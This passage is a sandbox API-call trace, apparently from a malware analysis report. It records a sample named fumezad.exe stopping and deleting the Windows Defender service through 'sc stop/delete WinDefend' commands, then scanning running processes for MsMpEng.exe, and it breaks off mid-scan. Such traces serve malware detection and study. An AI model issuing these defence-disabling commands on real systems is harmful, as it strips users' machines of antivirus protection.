returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.163] GetStartupInfoW (in: lpStartupInfo=0x428b8a | out: lpStartupInfo=0x428b8a*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0128.163] GetSystemDirectoryW (in: lpBuffer=0x18b018, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.163] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x601fe8 [0128.166] OpenServiceW (hSCManager=0x601fe8, lpServiceName="WinDefend", dwDesiredAccess=0x4) returned 0x601f48 [0128.167] QueryServiceStatusEx (in: hService=0x601f48, InfoLevel=0x0, lpBuffer=0x18afd4, cbBufSize=0x24, pcbBytesNeeded=0x18b000 | out: lpBuffer=0x18afd4, pcbBytesNeeded=0x18b000) returned 1 [0128.167] CloseServiceHandle (hSCObject=0x601f48) returned 1 [0128.167] CloseServiceHandle (hSCObject=0x601fe8) returned 1 [0128.177] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc stop WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x18afa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18af94 | out: lpCommandLine="/c sc stop WinDefend", lpProcessInformation=0x18af94*(hProcess=0xd4, hThread=0xd0, dwProcessId=0x874, dwThreadId=0x884)) returned 1 [0128.186] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc delete WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x18afa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18af94 | out: lpCommandLine="/c sc delete WinDefend", lpProcessInformation=0x18af94*(hProcess=0xd8, hThread=0xdc, dwProcessId=0x894, dwThreadId=0x898)) returned 1 [0128.192] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xec [0128.197] Process32FirstW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.198] lstrcmpiW (lpString1="[System Process]", lpString2="MsMpEng.exe") returned -1 [0128.200] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0128.201] lstrcmpiW (lpString1="System", lpString2="MsMpEng.exe") returned 1 [0128.201] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0128.202] lstrcmpiW (lpString1="smss.exe", lpString2="MsMpEng.exe") returned 1 [0128.202] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.202] lstrcmpiW (lpString1="csrss.exe", lpString2="MsMpEng.exe") returned -1 [0128.202] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0128.203] lstrcmpiW (lpString1="wininit.exe", lpString2="MsMpEng.exe") returned 1 [0128.203] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.204] lstrcmpiW (lpString1="csrss.exe", lpString2="MsMpEng.exe") returned -1 [0128.204] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0128.204] lstrcmpiW (lpString1="winlogon.exe", lpString2="MsMpEng.exe") returned 1 [0128.204] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0128.205] lstrcmpiW (lpString1="services.exe", lpString2="MsMpEng.exe") returned 1 [0128.205] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0128.206] lstrcmpiW (lpString1="lsass.exe", lpString2="MsMpEng.exe") returned -1 [0128.206] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0128.206] lstrcmpiW (lpString1="lsm.exe", lpString2="MsMpEng.exe") returned -1 [0128.206] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.207] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0128.207] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.208] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0128.208] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.209] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0128.209] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.209] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0128.209] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.210] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0128.210] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0128.211] lstrcmpiW (lpString1="audiodg.exe", lpString2="MsMpEng.exe") returned -1 [0128.211] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.211] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0128.212] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.212] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0128.212] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0128.213] lstrcmpiW (lpString1="dwm.exe", lpString2="MsMpEng.exe") returned -1 [0128.213] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0128.214] lstrcmpiW (lpString1="explorer.exe", lpString2="MsMpEng.exe") returned -1 [0128.214] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0128.215] lstrcmpiW (lpString1="spoolsv.exe", lpString2="MsMpEng.exe") returned 1 [0128.215] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.216] lstrcmpiW (lpString1="taskhost.exe", lpString2="MsMpEng.exe") returned 1 [0128.216] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.217] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0128.217] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0128.218] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="MsMpEng.exe") returned 1 [0128.218] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0128.219] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="MsMpEng.exe") returned 1 [0128.219] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0128.220] lstrcmpiW (lpString1="taskeng.exe", lpString2="MsMpEng.exe") returned 1 [0128.220] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.221] lstrcmpiW (lpString1="taskhost.exe", lpString2="MsMpEng.exe") returned 1 [0128.221] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="cdt_philadelphia.exe")) returned 1 [0128.222] lstrcmpiW (lpString1="cdt_philadelphia.exe", lpString2="MsMpEng.exe") returned -1 [0128.222] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pipesemesteraccepted.exe")) returned 1 [0128.224] lstrcmpiW (lpString1="pipesemesteraccepted.exe", lpString2="MsMpEng.exe") returned 1 [0128.224] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="midwest-prostate.exe")) returned 1 [0128.225] lstrcmpiW (lpString1="midwest-prostate.exe", lpString2="MsMpEng.exe") returned -1 [0128.225] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x430, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="edmonton cell.exe")) returned 1 [0128.226] lstrcmpiW (lpString1="edmonton cell.exe", lpString2="MsMpEng.exe") returned -1 [0128.226] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="approx_comparisons.exe")) returned 1 [0128.228] lstrcmpiW (lpString1="approx_comparisons.exe", lpString2="MsMpEng.exe") returned -1 [0128.228] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="compliant.exe")) returned 1 [0128.229] lstrcmpiW (lpString1="compliant.exe", lpString2="MsMpEng.exe") returned -1 [0128.229] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="memovisitorslover.exe")) returned 1 [0128.230] lstrcmpiW (lpString1="memovisitorslover.exe", lpString2="MsMpEng.exe") returned -1 [0128.230] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="fixes.exe")) returned 1 [0128.231] lstrcmpiW (lpString1="fixes.exe", lpString2="MsMpEng.exe") returned -1 [0128.231] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="lower-newfoundland-checks.exe")) returned 1 [0128.232] lstrcmpiW (lpString1="lower-newfoundland-checks.exe", lpString2="MsMpEng.exe") returned -1 [0128.232] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="practice sees.exe")) returned 1 [0128.233] lstrcmpiW (lpString1="practice sees.exe", lpString2="MsMpEng.exe") returned 1 [0128.233] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="mind.exe")) returned 1 [0128.234] lstrcmpiW (lpString1="mind.exe", lpString2="MsMpEng.exe") returned -1 [0128.234] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x70c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="autos.exe")) returned 1 [0128.235] lstrcmpiW (lpString1="autos.exe", lpString2="MsMpEng.exe") returned -1 [0128.235] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed spirit.exe")) returned 1 [0128.236] lstrcmpiW (lpString1="succeed spirit.exe", lpString2="MsMpEng.exe") returned 1 [0128.236] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="joseph saskatchewan.exe")) returned 1 [0128.237] lstrcmpiW (lpString1="joseph saskatchewan.exe", lpString2="MsMpEng.exe") returned -1 [0128.237] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="enrolled-lebanon.exe")) returned 1 [0128.237] lstrcmpiW (lpString1="enrolled-lebanon.exe", lpString2="MsMpEng.exe") returned -1 [0128.238] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pay_adapter.exe")) returned 1 [0128.238] lstrcmpiW (lpString1="pay_adapter.exe", lpString2="MsMpEng.exe") returned 1 [0128.238] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="mod.exe")) returned 1 [0128.239] lstrcmpiW (lpString1="mod.exe", lpString2="MsMpEng.exe") returned -1 [0128.239] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="completing-h.exe")) returned 1 [0128.240] lstrcmpiW (lpString1="completing-h.exe", lpString2="MsMpEng.exe") returned -1 [0128.240] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="water granny.exe")) returned 1 [0128.240] lstrcmpiW (lpString1="water granny.exe", lpString2="MsMpEng.exe") returned 1 [0128.240] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="somebody finder.exe")) returned 1 [0128.241] lstrcmpiW (lpString1="somebody finder.exe", lpString2="MsMpEng.exe") returned 1 [0128.241] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pathology refrigerator horror.exe")) returned 1 [0128.242] lstrcmpiW (lpString1="pathology refrigerator horror.exe", lpString2="MsMpEng.exe") returned 1 [0128.242] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="villagenodestrengths.exe")) returned 1 [0128.243] lstrcmpiW (lpString1="villagenodestrengths.exe", lpString2="MsMpEng.exe") returned 1 [0128.243] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="luther.exe")) returned 1 [0128.244] lstrcmpiW (lpString1="luther.exe", lpString2="MsMpEng.exe") returned -1 [0128.244] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0128.244] lstrcmpiW (lpString1="WINWORD.EXE", lpString2="MsMpEng.exe") returned 1 [0128.244] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.245] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0128.245] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0128.246] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="MsMpEng.exe") returned 1 [0128.246] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0128.246] lstrcmpiW (lpString1="sppsvc.exe", lpString2="MsMpEng.exe") returned 1 [0128.246] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.247] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0128.247] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x8bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0128.248] lstrcmpiW (lpString1="cmd.exe", lpString2="MsMpEng.exe") returned -1 [0128.248] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0128.249] lstrcmpiW (lpString1="conhost.exe", lpString2="MsMpEng.exe") returned -1 [0128.249] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x900, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0128.249] lstrcmpiW (lpString1="powershell.exe", lpString2="MsMpEng.exe") returned 1 [0128.249] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="fumezad.exe")) returned 1 [0128.250] lstrcmpiW 